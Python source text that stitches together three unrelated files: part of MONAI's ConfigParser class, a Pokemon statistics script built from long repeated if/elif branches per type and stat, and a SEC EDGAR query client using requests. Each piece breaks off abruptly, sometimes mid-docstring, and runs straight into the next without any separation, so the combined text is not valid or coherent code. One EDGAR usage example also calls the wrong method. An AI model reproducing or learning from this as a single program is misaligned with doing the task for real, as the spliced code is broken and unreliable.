# Copyright (c) MONAI Consortium
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import importlib
import json
import re
from copy import deepcopy
from pathlib import Path
from typing import Any, Dict, Optional, Sequence, Tuple, Union
from monai.bundle.config_item import ComponentLocator, ConfigComponent, ConfigExpression, ConfigItem
from monai.bundle.reference_resolver import ReferenceResolver
from monai.bundle.utils import ID_SEP_KEY, MACRO_KEY
from monai.config import PathLike
from monai.utils import ensure_tuple, look_up_option, optional_import
yaml, _ = optional_import("yaml")
__all__ = ["ConfigParser"]
class ConfigParser:
"""
The primary configuration parser. It traverses a structured config (in the form of nested Python dict or list),
    creates ``ConfigItem``, and assigns unique IDs according to the structures.
This class provides convenient access to the set of ``ConfigItem`` of the config by ID.
A typical workflow of config parsing is as follows:
- Initialize ``ConfigParser`` with the ``config`` source.
- Call ``get_parsed_content()`` to get expected component with `id`.
.. code-block:: python
from monai.bundle import ConfigParser
config = {
"my_dims": 2,
"dims_1": "$@my_dims + 1",
"my_xform": {"_target_": "LoadImage"},
"my_net": {"_target_": "BasicUNet", "spatial_dims": "@dims_1", "in_channels": 1, "out_channels": 4},
"trainer": {"_target_": "SupervisedTrainer", "network": "@my_net", "preprocessing": "@my_xform"}
}
# in the example $@my_dims + 1 is an expression, which adds 1 to the value of @my_dims
parser = ConfigParser(config)
# get/set configuration content, the set method should happen before calling parse()
print(parser["my_net"]["in_channels"]) # original input channels 1
parser["my_net"]["in_channels"] = 4 # change input channels to 4
print(parser["my_net"]["in_channels"])
# instantiate the network component
parser.parse(True)
net = parser.get_parsed_content("my_net", instantiate=True)
print(net)
# also support to get the configuration content of parsed `ConfigItem`
trainer = parser.get_parsed_content("trainer", instantiate=False)
print(trainer)
Args:
config: input config source to parse.
excludes: when importing modules to instantiate components,
excluding components from modules specified in ``excludes``.
globals: pre-import packages as global variables to ``ConfigExpression``,
so that expressions, for example, ``"$monai.data.list_data_collate"`` can use ``monai`` modules.
The current supported globals and alias names are
``{"monai": "monai", "torch": "torch", "np": "numpy", "numpy": "numpy"}``.
These are MONAI's minimal dependencies.
See also:
- :py:class:`monai.bundle.ConfigItem`
- :py:class:`monai.bundle.scripts.run`
"""
suffixes = ("json", "yaml", "yml")
suffix_match = rf".*\.({'|'.join(suffixes)})"
path_match = rf"({suffix_match}$)"
meta_key = "_meta_" # field key to save metadata
def __init__(
self,
config: Any = None,
excludes: Optional[Union[Sequence[str], str]] = None,
globals: Optional[Dict[str, Any]] = None,
):
self.config = None
self.globals: Dict[str, Any] = {}
globals = {"monai": "monai", "torch": "torch", "np": "numpy", "numpy": "numpy"} if globals is None else globals
if globals is not None:
for k, v in globals.items():
self.globals[k] = importlib.import_module(v) if isinstance(v, str) else v
self.locator = ComponentLocator(excludes=excludes)
self.ref_resolver = ReferenceResolver()
if config is None:
config = {self.meta_key: {}}
self.set(config=config)
def __repr__(self):
return f"{self.config}"
def __getitem__(self, id: Union[str, int]):
"""
Get the config by id.
Args:
id: id of the ``ConfigItem``, ``"#"`` in id are interpreted as special characters to
go one level further into the nested structures.
Use digits indexing from "0" for list or other strings for dict.
For example: ``"xform#5"``, ``"net#channels"``. ``""`` indicates the entire ``self.config``.
"""
if id == "":
return self.config
config = self.config
for k in str(id).split(self.ref_resolver.sep):
if not isinstance(config, (dict, list)):
raise ValueError(f"config must be dict or list for key `{k}`, but got {type(config)}: {config}.")
indexing = k if isinstance(config, dict) else int(k)
config = config[indexing]
return config
def __setitem__(self, id: Union[str, int], config: Any):
"""
Set config by ``id``. Note that this method should be used before ``parse()`` or ``get_parsed_content()``
to ensure the updates are included in the parsed content.
Args:
id: id of the ``ConfigItem``, ``"#"`` in id are interpreted as special characters to
go one level further into the nested structures.
Use digits indexing from "0" for list or other strings for dict.
For example: ``"xform#5"``, ``"net#channels"``. ``""`` indicates the entire ``self.config``.
config: config to set at location ``id``.
"""
if id == "":
self.config = config
self.ref_resolver.reset()
return
keys = str(id).split(self.ref_resolver.sep)
# get the last parent level config item and replace it
last_id = self.ref_resolver.sep.join(keys[:-1])
conf_ = self[last_id]
indexing = keys[-1] if isinstance(conf_, dict) else int(keys[-1])
conf_[indexing] = config
self.ref_resolver.reset()
return
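    # Illustrative sketch (not part of the original file): ``__getitem__`` and
    # ``__setitem__`` accept nested ids joined by "#", so the following two forms
    # are equivalent:
    #
    #     parser = ConfigParser({"net": {"channels": 2}})
    #     parser["net"]["channels"] = 4   # indexing one level at a time
    #     parser["net#channels"] = 4      # using the "#"-separated id
    #     assert parser["net#channels"] == 4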
def get(self, id: str = "", default: Optional[Any] = None):
"""
Get the config by id.
Args:
id: id to specify the expected position. See also :py:meth:`__getitem__`.
default: default value to return if the specified ``id`` is invalid.
"""
try:
return self[id]
except KeyError:
return default
def set(self, config: Any, id: str = ""):
"""
Set config by ``id``. See also :py:meth:`__setitem__`.
"""
self[id] = config
def parse(self, reset: bool = True):
"""
Recursively resolve `self.config` to replace the macro tokens with target content.
Then recursively parse the config source, add every item as ``ConfigItem`` to the reference resolver.
Args:
reset: whether to reset the ``reference_resolver`` before parsing. Defaults to `True`.
"""
if reset:
self.ref_resolver.reset()
self.resolve_macro()
self._do_parse(config=self.get())
def get_parsed_content(self, id: str = "", **kwargs):
"""
Get the parsed result of ``ConfigItem`` with the specified ``id``.
- If the item is ``ConfigComponent`` and ``instantiate=True``, the result is the instance.
- If the item is ``ConfigExpression`` and ``eval_expr=True``, the result is the evaluated output.
- Else, the result is the configuration content of `ConfigItem`.
Args:
id: id of the ``ConfigItem``, ``"#"`` in id are interpreted as special characters to
go one level further into the nested structures.
Use digits indexing from "0" for list or other strings for dict.
For example: ``"xform#5"``, ``"net#channels"``. ``""`` indicates the entire ``self.config``.
kwargs: additional keyword arguments to be passed to ``_resolve_one_item``.
Currently support ``reset`` (for parse), ``instantiate`` and ``eval_expr``. All defaulting to True.
"""
if not self.ref_resolver.is_resolved():
# not parsed the config source yet, parse it
self.parse(kwargs.get("reset", True))
return self.ref_resolver.get_resolved_content(id=id, **kwargs)
def read_meta(self, f: Union[PathLike, Sequence[PathLike], Dict], **kwargs):
"""
Read the metadata from specified JSON or YAML file.
The metadata as a dictionary will be stored at ``self.config["_meta_"]``.
Args:
f: filepath of the metadata file, the content must be a dictionary,
                if providing a list of files, will merge their content.
if providing a dictionary directly, use it as metadata.
kwargs: other arguments for ``json.load`` or ``yaml.safe_load``, depends on the file format.
"""
self.set(self.load_config_files(f, **kwargs), self.meta_key)
def read_config(self, f: Union[PathLike, Sequence[PathLike], Dict], **kwargs):
"""
Read the config from specified JSON or YAML file.
        The config content is stored in the `self.config` dictionary.
Args:
f: filepath of the config file, the content must be a dictionary,
                if providing a list of files, will merge their content.
if providing a dictionary directly, use it as config.
kwargs: other arguments for ``json.load`` or ``yaml.safe_load``, depends on the file format.
"""
content = {self.meta_key: self.get(self.meta_key, {})}
content.update(self.load_config_files(f, **kwargs))
self.set(config=content)
def _do_resolve(self, config: Any):
"""
Recursively resolve the config content to replace the macro tokens with target content.
The macro tokens start with "%", can be from another structured file, like:
``{"net": "%default_net"}``, ``{"net": "%/data/config.json#net"}``.
Args:
config: input config file to resolve.
"""
if isinstance(config, (dict, list)):
for k, v in enumerate(config) if isinstance(config, list) else config.items():
config[k] = self._do_resolve(v)
if isinstance(config, str) and config.startswith(MACRO_KEY):
path, ids = ConfigParser.split_path_id(config[len(MACRO_KEY) :])
parser = ConfigParser(config=self.get() if not path else ConfigParser.load_config_file(path))
return self._do_resolve(config=deepcopy(parser[ids]))
return config
def resolve_macro(self):
"""
Recursively resolve `self.config` to replace the macro tokens with target content.
The macro tokens are marked as starting with "%", can be from another structured file, like:
``"%default_net"``, ``"%/data/config.json#net"``.
"""
self.set(self._do_resolve(config=deepcopy(self.get())))
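    # Illustrative sketch (not part of the original file): a macro value such as
    # "%default_net" is replaced by the content found at id "default_net" of this
    # config, while "%/data/config.json#net" would first load that file from disk:
    #
    #     parser = ConfigParser({"default_net": {"_target_": "BasicUNet"}, "net": "%default_net"})
    #     parser.resolve_macro()
    #     assert parser["net"] == {"_target_": "BasicUNet"}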
def _do_parse(self, config, id: str = ""):
"""
Recursively parse the nested data in config source, add every item as `ConfigItem` to the resolver.
Args:
config: config source to parse.
id: id of the ``ConfigItem``, ``"#"`` in id are interpreted as special characters to
                go one level further into the nested structures.
import loaddata
import pokemon_regression
import pokemon_stat_analysis
import pokemon_test_are_dragons_taller
import pokemon_normal_dist_and_actual_vals
separator_char = ", "
separator = '---------------------------------------------------------------'
tab: str = "\t"
def do_normal_dist_against_actual_values(options):
data_set, type_set, stat_set = options[0], options[1], options[2]
if data_set == "1": # all pokemon
set_name = "Pokemon"
modifier = ''
# grass pokemon
if type_set == "1":
if stat_set == "1": # stat totals
stat_name = "Stat Total"
test_bounds = (100, 600)
stat_values = loaddata.grass_types['total_points']
stat_stats = loaddata.grass_types['total_points'].describe()
unit = ''
elif stat_set == "2": # hp
stat_name = "HP"
test_bounds = (20, 256)
stat_values = loaddata.grass_types['hp']
stat_stats = loaddata.grass_types['hp'].describe()
unit = ''
elif stat_set == "3": # speed
stat_name = "Speed"
test_bounds = (20, 256)
stat_values = loaddata.grass_types['speed']
stat_stats = loaddata.grass_types['speed'].describe()
unit = ''
elif stat_set == "4": # attack
stat_name = "Attack"
test_bounds = (20, 256)
stat_values = loaddata.grass_types['attack']
stat_stats = loaddata.grass_types['attack'].describe()
unit = ''
elif stat_set == "5": # defense
stat_name = "Defense"
test_bounds = (20, 256)
stat_values = loaddata.grass_types['defense']
stat_stats = loaddata.grass_types['defense'].describe()
unit = ''
elif stat_set == "6": # sp.attack
stat_name = "Special Attack"
test_bounds = (20, 256)
stat_values = loaddata.grass_types['sp_attack']
stat_stats = loaddata.grass_types['sp_attack'].describe()
unit = ''
elif stat_set == "7": # sp.defense
stat_name = "Special Defense"
test_bounds = (20, 256)
stat_values = loaddata.grass_types['sp_defense']
stat_stats = loaddata.grass_types['sp_defense'].describe()
unit = ''
elif stat_set == "8": # height
stat_name = "Height(m)"
test_bounds = (0, 20)
stat_values = loaddata.grass_types['height_m']
stat_stats = loaddata.grass_types['height_m'].describe()
unit = '(m)'
elif stat_set == "9": # weight
stat_name = "Weight(kg)"
test_bounds = (1, 800)
stat_values = loaddata.grass_types['weight_kg']
stat_stats = loaddata.grass_types['weight_kg'].describe()
unit = '(kg)'
else:
return
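        # Illustrative sketch (not part of the original script): the per-stat branches
        # repeat for every type below, so they could be collapsed into a lookup table.
        # The names STAT_OPTIONS and frame are hypothetical, not defined in this script.
        #
        #     STAT_OPTIONS = {
        #         "1": ("Stat Total", (100, 600), "total_points", ""),
        #         "2": ("HP", (20, 256), "hp", ""),
        #         "8": ("Height(m)", (0, 20), "height_m", "(m)"),
        #         "9": ("Weight(kg)", (1, 800), "weight_kg", "(kg)"),
        #     }
        #     stat_name, test_bounds, column, unit = STAT_OPTIONS[stat_set]
        #     stat_values = frame[column]      # frame = the DataFrame for the chosen type
        #     stat_stats = stat_values.describe()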
# fire pokemon
elif type_set == "2":
if stat_set == "1": # stat totals
stat_name = "Stat Total"
test_bounds = (100, 600)
stat_values = loaddata.fire_types['total_points']
stat_stats = loaddata.fire_types['total_points'].describe()
unit = ''
elif stat_set == "2": # hp
stat_name = "HP"
test_bounds = (20, 256)
stat_values = loaddata.fire_types['hp']
stat_stats = loaddata.fire_types['hp'].describe()
unit = ''
elif stat_set == "3": # speed
stat_name = "Speed"
test_bounds = (20, 256)
stat_values = loaddata.fire_types['speed']
stat_stats = loaddata.fire_types['speed'].describe()
unit = ''
elif stat_set == "4": # attack
stat_name = "Attack"
test_bounds = (20, 256)
stat_values = loaddata.fire_types['attack']
stat_stats = loaddata.fire_types['attack'].describe()
unit = ''
elif stat_set == "5": # defense
stat_name = "Defense"
test_bounds = (20, 256)
stat_values = loaddata.fire_types['defense']
stat_stats = loaddata.fire_types['defense'].describe()
unit = ''
elif stat_set == "6": # sp.attack
stat_name = "Special Attack"
test_bounds = (20, 256)
stat_values = loaddata.fire_types['sp_attack']
stat_stats = loaddata.fire_types['sp_attack'].describe()
unit = ''
elif stat_set == "7": # sp.defense
stat_name = "Special Defense"
test_bounds = (20, 256)
stat_values = loaddata.fire_types['sp_defense']
stat_stats = loaddata.fire_types['sp_defense'].describe()
unit = ''
elif stat_set == "8": # height
stat_name = "Height(m)"
test_bounds = (0, 20)
stat_values = loaddata.fire_types['height_m']
stat_stats = loaddata.fire_types['height_m'].describe()
unit = '(m)'
elif stat_set == "9": # weight
stat_name = "Weight(kg)"
test_bounds = (1, 800)
stat_values = loaddata.fire_types['weight_kg']
stat_stats = loaddata.fire_types['weight_kg'].describe()
unit = '(kg)'
else:
return
# water pokemon
elif type_set == "3":
if stat_set == "1": # stat totals
stat_name = "Stat Total"
test_bounds = (100, 600)
stat_values = loaddata.water_types['total_points']
stat_stats = loaddata.water_types['total_points'].describe()
unit = ''
elif stat_set == "2": # hp
stat_name = "HP"
test_bounds = (20, 256)
stat_values = loaddata.water_types['hp']
stat_stats = loaddata.water_types['hp'].describe()
unit = ''
elif stat_set == "3": # speed
stat_name = "Speed"
test_bounds = (20, 256)
stat_values = loaddata.water_types['speed']
stat_stats = loaddata.water_types['speed'].describe()
unit = ''
elif stat_set == "4": # attack
stat_name = "Attack"
test_bounds = (20, 256)
stat_values = loaddata.water_types['attack']
stat_stats = loaddata.water_types['attack'].describe()
unit = ''
elif stat_set == "5": # defense
stat_name = "Defense"
test_bounds = (20, 256)
stat_values = loaddata.water_types['defense']
stat_stats = loaddata.water_types['defense'].describe()
unit = ''
elif stat_set == "6": # sp.attack
stat_name = "Special Attack"
test_bounds = (20, 256)
stat_values = loaddata.water_types['sp_attack']
stat_stats = loaddata.water_types['sp_attack'].describe()
unit = ''
elif stat_set == "7": # sp.defense
stat_name = "Special Defense"
test_bounds = (20, 256)
stat_values = loaddata.water_types['sp_defense']
stat_stats = loaddata.water_types['sp_defense'].describe()
unit = ''
elif stat_set == "8": # height
stat_name = "Height(m)"
test_bounds = (0, 20)
stat_values = loaddata.water_types['height_m']
stat_stats = loaddata.water_types['height_m'].describe()
unit = '(m)'
elif stat_set == "9": # weight
stat_name = "Weight(kg)"
test_bounds = (1, 800)
stat_values = loaddata.water_types['weight_kg']
stat_stats = loaddata.water_types['weight_kg'].describe()
unit = '(kg)'
else:
return
# electric pokemon
elif type_set == "4":
if stat_set == "1": # stat totals
stat_name = "Stat Total"
test_bounds = (100, 600)
stat_values = loaddata.electric_types['total_points']
stat_stats = loaddata.electric_types['total_points'].describe()
unit = ''
elif stat_set == "2": # hp
stat_name = "HP"
test_bounds = (20, 256)
stat_values = loaddata.electric_types['hp']
stat_stats = loaddata.electric_types['hp'].describe()
unit = ''
elif stat_set == "3": # speed
stat_name = "Speed"
test_bounds = (20, 256)
stat_values = loaddata.electric_types['speed']
stat_stats = loaddata.electric_types['speed'].describe()
unit = ''
elif stat_set == "4": # attack
stat_name = "Attack"
test_bounds = (20, 256)
stat_values = loaddata.electric_types['attack']
stat_stats = loaddata.electric_types['attack'].describe()
unit = ''
elif stat_set == "5": # defense
stat_name = "Defense"
test_bounds = (20, 256)
stat_values = loaddata.electric_types['defense']
stat_stats = loaddata.electric_types['defense'].describe()
unit = ''
elif stat_set == "6": # sp.attack
stat_name = "Special Attack"
test_bounds = (20, 256)
stat_values = loaddata.electric_types['sp_attack']
stat_stats = loaddata.electric_types['sp_attack'].describe()
unit = ''
elif stat_set == "7": # sp.defense
stat_name = "Special Defense"
test_bounds = (20, 256)
stat_values = loaddata.electric_types['sp_defense']
stat_stats = loaddata.electric_types['sp_defense'].describe()
unit = ''
elif stat_set == "8": # height
stat_name = "Height(m)"
test_bounds = (0, 20)
stat_values = loaddata.electric_types['height_m']
stat_stats = loaddata.electric_types['height_m'].describe()
unit = '(m)'
elif stat_set == "9": # weight
stat_name = "Weight(kg)"
test_bounds = (1, 800)
stat_values = loaddata.electric_types['weight_kg']
stat_stats = loaddata.electric_types['weight_kg'].describe()
unit = '(kg)'
else:
return
# psychic pokemon
elif type_set == "5":
if stat_set == "1": # stat totals
stat_name = "Stat Total"
test_bounds = (100, 600)
stat_values = loaddata.psychic_types['total_points']
stat_stats = loaddata.psychic_types['total_points'].describe()
unit = ''
elif stat_set == "2": # hp
stat_name = "HP"
test_bounds = (20, 256)
stat_values = loaddata.psychic_types['hp']
stat_stats = loaddata.psychic_types['hp'].describe()
unit = ''
elif stat_set == "3": # speed
stat_name = "Speed"
test_bounds = (20, 256)
stat_values = loaddata.psychic_types['speed']
stat_stats = loaddata.psychic_types['speed'].describe()
unit = ''
elif stat_set == "4": # attack
stat_name = "Attack"
test_bounds = (20, 256)
stat_values = loaddata.psychic_types['attack']
stat_stats = loaddata.psychic_types['attack'].describe()
unit = ''
elif stat_set == "5": # defense
stat_name = "Defense"
test_bounds = (20, 256)
stat_values = loaddata.psychic_types['defense']
stat_stats = loaddata.psychic_types['defense'].describe()
unit = ''
elif stat_set == "6": # sp.attack
stat_name = "Special Attack"
test_bounds = (20, 256)
stat_values = loaddata.psychic_types['sp_attack']
stat_stats = loaddata.psychic_types['sp_attack'].describe()
unit = ''
elif stat_set == "7": # sp.defense
stat_name = "Special Defense"
test_bounds = (20, 256)
stat_values = loaddata.psychic_types['sp_defense']
stat_stats = loaddata.psychic_types['sp_defense'].describe()
unit = ''
elif stat_set == "8": # height
stat_name = "Height(m)"
test_bounds = (0, 20)
stat_values = loaddata.psychic_types['height_m']
stat_stats = loaddata.psychic_types['height_m'].describe()
unit = '(m)'
elif stat_set == "9": # weight
stat_name = "Weight(kg)"
test_bounds = (1, 800)
stat_values = loaddata.psychic_types['weight_kg']
stat_stats = loaddata.psychic_types['weight_kg'].describe()
unit = '(kg)'
else:
return
# ice pokemon
elif type_set == "6":
if stat_set == "1": # stat totals
stat_name = "Stat Total"
test_bounds = (100, 600)
stat_values = loaddata.ice_types['total_points']
stat_stats = loaddata.ice_types['total_points'].describe()
unit = ''
elif stat_set == "2": # hp
stat_name = "HP"
test_bounds = (20, 256)
stat_values = loaddata.ice_types['hp']
stat_stats = loaddata.ice_types['hp'].describe()
unit = ''
elif stat_set == "3": # speed
stat_name = "Speed"
test_bounds = (20, 256)
stat_values = loaddata.ice_types['speed']
stat_stats = loaddata.ice_types['speed'].describe()
unit = ''
elif stat_set == "4": # attack
stat_name = "Attack"
test_bounds = (20, 256)
stat_values = loaddata.ice_types['attack']
stat_stats = loaddata.ice_types['attack'].describe()
unit = ''
elif stat_set == "5": # defense
stat_name = "Defense"
test_bounds = (20, 256)
stat_values = loaddata.ice_types['defense']
stat_stats = loaddata.ice_types['defense'].describe()
unit = ''
elif stat_set == "6": # sp.attack
stat_name = "Special Attack"
test_bounds = (20, 256)
stat_values = loaddata.ice_types['sp_attack']
stat_stats = loaddata.ice_types['sp_attack'].describe()
unit = ''
elif stat_set == "7": # sp.defense
stat_name = "Special Defense"
test_bounds = (20, 256)
stat_values = loaddata.ice_types['sp_defense']
stat_stats = loaddata.ice_types['sp_defense'].describe()
unit = ''
elif stat_set == "8": # height
stat_name = "Height(m)"
test_bounds = (0, 20)
stat_values = loaddata.ice_types['height_m']
stat_stats = loaddata.ice_types['height_m'].describe()
unit = '(m)'
            elif stat_set == "9":  # weight
                stat_name = "Weight(kg)"
                test_bounds = (1, 800)
                stat_values = loaddata.ice_types['weight_kg']
                stat_stats = loaddata.ice_types['weight_kg'].describe()
                unit = '(kg)'
            else:
                return
import requests
import xml.etree.ElementTree as ET
from typing import List
from typing import Union
from datetime import date
from datetime import datetime
from pysec.parser import EDGARParser
# https://www.sec.gov/cgi-bin/srch-edgar?text=form-type%3D%2810-q*+OR+10-k*%29&first=2020&last=2020
class EDGARQuery():
def __init__(self):
"""Initalizes the EDGAR Client with the different endpoints used."""
# base URL for the SEC EDGAR browser
self.sec_url = "https://www.sec.gov"
self.archive_service = "https://www.sec.gov/Archives/edgar"
self.browse_service = "https://www.sec.gov/cgi-bin/browse-edgar"
self.issuer_service = "https://www.sec.gov/cgi-bin/own-disp"
self.search_service = "https://www.sec.gov/cgi-bin/srch-edgar"
self.series_service = "https://www.sec.gov/cgi-bin/series"
self.current_service = "https://www.sec.gov/cgi-bin/current"
self.sec_cgi_endpoint = "https://www.sec.gov/cgi-bin"
self.cik_lookup = 'cik_lookup'
self.mutal_fund_search = 'series'
self.parser_client = EDGARParser()
def get_sec_datasets(self) -> dict:
"""Grabs all the Public datasets provided by the SEC.
Returns:
----
dict: A collection of SEC datasets.
Usage:
----
>>> edgar_client = EDGARQuery()
>>> sec_datasets = edgar_client.get_sec_datasets()
{
"@context": "https://project-open-data.cio.gov/v1.1/schema/catalog.jsonld",
"@id": "https://www.sec.gov/data.json",
"@type": "dcat:Catalog",
"conformsTo": "https://project-open-data.cio.gov/v1.1/schema",
"describedBy": "https://project-open-data.cio.gov/v1.1/schema/catalog.json",
"dataset": []
}
"""
# Make the request.
response = requests.get(
url='https://www.sec.gov/data.json'
)
if response.ok:
return response.json()
def get_edgar_taxonomies(self) -> dict:
"""Grabs all the Public taxonomies datasets provided by the SEC.
Returns:
----
dict: A collection of Taxonomy files for the SEC.
Usage:
----
>>> edgar_client = EDGARQuery()
>>> sec_datasets = edgar_client.get_edgar_taxonomies()
[
{
'AttType': 'SCH',
'Elements': '0',
'Family': 'BASE',
'FileTypeName': 'Schema',
'Href': 'http://www.xbrl.org/2003/xbrl-linkbase-2003-12-31.xsd',
'Namespace': 'http://www.xbrl.org/2003/linkbase',
'Prefix': 'link',
'Version': '2010'
},
{
'AttType': 'SCH',
'Elements': '0',
'Family': 'BASE',
'FileTypeName': 'Schema',
'Href': 'http://www.xbrl.org/2003/xbrl-instance-2003-12-31.xsd',
'Namespace': 'http://www.xbrl.org/2003/instance',
'Prefix': 'xbrli',
'Version': '2010'
}
]
"""
# Make the request.
response = requests.get(
url='https://www.sec.gov/info/edgar/edgartaxonomies.xml'
)
# Parse the response.
taxonomies = self.parser_client.parse_loc_elements(
response_text=response.text
)
return taxonomies
def company_directories(self, cik: str) -> dict:
"""Grabs all the filing directories for a company.
Overview:
----
        Companies often file many SEC disclosures, so this endpoint
        makes grabbing all the filing directories associated with a company
        easy, by only requiring the CIK number.
Arguments:
----
cik {str} -- The company CIK number, defined by the SEC.
Returns:
----
dict -- A Dictionary containing the directory filings path.
Usage:
----
>>> edgar_client = EDGARQuery()
>>> company_filings = edgar_client.company_directories(cik='1265107')
[
{
'last-modified': '2019-07-02 12:27:42',
'name': '000000000019010655',
'size': '',
'type': 'folder.gif',
'url': 'https://www.sec.gov/Archives/edgar/data/1265107/000000000019010655/index.json'
},
{
'last-modified': '2019-07-01 17:17:26',
'name': '000110465919038688',
'size': '',
'type': 'folder.gif',
'url': 'https://www.sec.gov/Archives/edgar/data/1265107/000110465919038688/index.json'
}
]
"""
# Build the URL.
url = self.archive_service + "/data/{cik_number}/index.json".format(
cik_number=cik
)
cleaned_directories = []
directories = requests.get(url=url).json()
# Loop through each item.
for directory in directories['directory']['item']:
# Create the URL.
directory['url'] = self.archive_service + "/data/{cik_number}/{directory_id}/index.json".format(
cik_number=cik,
directory_id=directory['name']
)
directory['filing_id'] = directory.pop('name')
directory['last_modified'] = directory.pop('last-modified')
cleaned_directories.append(directory)
return cleaned_directories
def company_directory(self, cik: str, filing_id: str) -> dict:
"""Grabs all the items from a specific filing.
Overview:
----
        The SEC organizes filings by CIK number, which represents a single
        entity. Each entity can have multiple filings, each identified
        by a filing ID, and a filing can contain multiple items.
This endpoint will return all the items from a specific filing that
belongs to a single company.
Arguments:
----
cik {str} -- The company CIK number, defined by the SEC.
filing_id {str} -- The ID of filing to pull.
Returns:
----
dict -- A Dictionary containing the filing items.
Usage:
----
>>> edgar_client = EDGARQuery()
>>> company_filings = edgar_client.company_directory(cik='1265107', filing_id='000110465919038688')
[
{
'item_id': '0001104659-19-038688.txt',
'last_modified': '2019-07-01 17:17:26',
'size': '',
'type': 'text.gif',
'url': 'https://www.sec.gov/Archives/edgar/data/1265107/000110465919038688/0001104659-19-038688.txt'
},
{
'item_id': 'a19-12321_2425.htm',
'last_modified': '2019-07-01 17:17:26',
'size': '37553',
'type': 'text.gif',
'url': 'https://www.sec.gov/Archives/edgar/data/1265107/000110465919038688/a19-12321_2425.htm'
}
]
"""
url = self.archive_service + "/data/{cik_number}/{filing_number}/index.json".format(
cik_number=cik,
filing_number=filing_id
)
cleaned_items = []
directory = requests.get(url=url).json()
for item in directory['directory']['item']:
item['url'] = self.archive_service + "/data/{cik_number}/{directory_id}/{file_id}".format(
cik_number=cik,
directory_id=filing_id,
file_id=item['name']
)
item['item_id'] = item.pop('name')
item['last_modified'] = item.pop('last-modified')
cleaned_items.append(item)
return cleaned_items
def company_filings_by_type(self, cik: str, filing_type: str) -> List[dict]:
"""Returns all the filings of certain type for a particular company.
Arguments:
----
cik {str} -- The company CIK Number.
filing_type {str} -- The filing type ID.
Returns:
----
dict -- A Dictionary containing the filing items.
Usage:
----
>>> edgar_client = EDGARQuery()
>>> company_filings = edgar_client.company_directory(cik='1265107', filing_id='000110465919038688')
[
{
'item_id': '0001104659-19-038688.txt',
'last_modified': '2019-07-01 17:17:26',
'size': '',
'type': 'text.gif',
'url': 'https://www.sec.gov/Archives/edgar/data/1265107/000110465919038688/0001104659-19-038688.txt'
},
{
'item_id': 'a19-12321_2425.htm',
'last_modified': '2019-07-01 17:17:26',
'size': '37553',
'type': 'text.gif',
'url': 'https://www.sec.gov/Archives/edgar/data/1265107/000110465919038688/a19-12321_2425.htm'
}
]
"""
# Set the params
params = {
'action': 'getcompany',
'CIK': cik,
'type': filing_type,
'output': 'atom'
}
# Grab the response.
response = requests.get(
url=self.browse_service,
params=params
)
# Parse the entries.
entries = self.parser_client.parse_entries(entries_text=response.text)
return entries
def companies_by_state(self, state: str, num_of_companies: int = None) -> List[dict]:
"""Returns all the companies that fall under a given state.
Arguments:
----
        state {str} -- The two-letter state code used to filter companies.
Returns:
----
        List[dict] -- A list of company Entry resources for the given state.
"""
# define the arguments of the request
search_sic_params = {
'State': state,
'Count': '100',
'action': 'getcompany',
'output': 'atom'
}
response = requests.get(
url=self.browse_service,
params=search_sic_params
)
# Parse the entries.
entries = self.parser_client.parse_entries(
entries_text=response.text,
num_of_items=num_of_companies
)
return entries
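    # Illustrative usage sketch (hypothetical values, mirroring the usage examples
    # of the other query methods):
    #
    #     edgar_client = EDGARQuery()
    #     california_companies = edgar_client.companies_by_state(state='CA', num_of_companies=10)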
def companies_by_country(self, country: str, num_of_companies: int = None) -> List[dict]:
"""Grabs all the companies that fall under a particular country code.
Arguments:
----
country {str} -- The country code.
Keyword Arguments:
----
num_of_companies {int} -- If you would like to limit the number of results, then
specify the number of companies you want back. (default: {None})
Returns:
----
List[dict] -- A list of Entry resources.
"""
# define the arguments of the request
search_sic_params = {
'Country': country,
'Count': '100',
'action': 'getcompany',
'output': 'atom'
}
# Grab the Response.
response = requests.get(
url=self.browse_service,
params=search_sic_params
)
# Parse the entries.
entries = self.parser_client.parse_entries(
entries_text=response.text,
num_of_items=num_of_companies
)
return entries
def companies_by_sic(self, sic_code: str, num_of_companies: int = None, start: int = None) -> List[dict]:
"""Grabs all companies with a certain SIC code.
        Returns all companies that fall under a particular SIC code. The information returned
        by this endpoint depends on the information available for the company.
Arguments:
----
sic_code {str} -- The SIC code for a particular Industry.
Keyword Arguments:
----
num_of_companies {int} -- If you would like to limit the number of results, then
specify the number of companies you want back. (default: {None})
start {int} -- Specifies the starting company number. (default: {None})
Returns:
----
list[dict] -- A list of companies with the following attributes:
[
{
"state": "MN",
"cik": "0000066740",
"last-date": "",
"name": "<NAME>",
"sic-code": "3841",
"id": "urn:tag:www.sec.gov:cik=0000066740",
"href": "URL",
"type": "html",
"summary": "<strong>CIK:</strong> 0000066740, <strong>State:</strong> MN",
"title": "3M CO",
"updated": "2020-04-05T15:21:24-04:00",
"atom_owner_only": "URL",
"atom_owner_exclude": "URL",
"atom_owner_include": "URL",
"html_owner_only": "URL",
"html_owner_exclude": "URL",
"html_owner_include": "URL",
"atom_owner_only_filtered_date": "URL",
"atom_owner_exclude_filtered_date": "URL",
"atom_owner_include_filtered_date": "URL",
"html_owner_only_filtered_date": "URL",
"html_owner_exclude_filtered_date": "URL",
"html_owner_include_filtered_date": "URL",
}
]
"""
if not start:
start = 0
# define the arguments of the request
        search_sic_params = {
            'SIC': sic_code,
            'Count': '100',
            'action': 'getcompany',
            'output': 'atom',
            'start': start
        }
# Make the response.
response = requests.get(
url=self.browse_service,
params=search_sic_params
)
# Parse the entries.
entries = self.parser_client.parse_entries(
entries_text=response.text,
num_of_items=num_of_companies,
start=start
)
return entries
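    # Illustrative pagination sketch (hypothetical loop, not from the original file):
    # the request caps results at Count=100, so `start` can be advanced in steps
    # of 100 to walk through a large SIC code:
    #
    #     edgar_client = EDGARQuery()
    #     page_1 = edgar_client.companies_by_sic(sic_code='3841', start=0)
    #     page_2 = edgar_client.companies_by_sic(sic_code='3841', start=100)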
def ownership_filings_by_cik(self, cik: str, before: Union[str, date] = None, after: Union[str, date] = None) -> List[dict]:
"""Returns all the ownership filings for a given CIK number in a given date range.
Arguments:
----
cik {str} -- The CIK number of the company to be queried.
Keyword Arguments:
----
before {Union[str, date]} -- Represents filings that you want before a certain
date. For example, "2019-12-01" means return all the filings BEFORE
            December 1, 2019. (default: {None})
after {Union[str, date]} -- Represents filings that you want after a certain
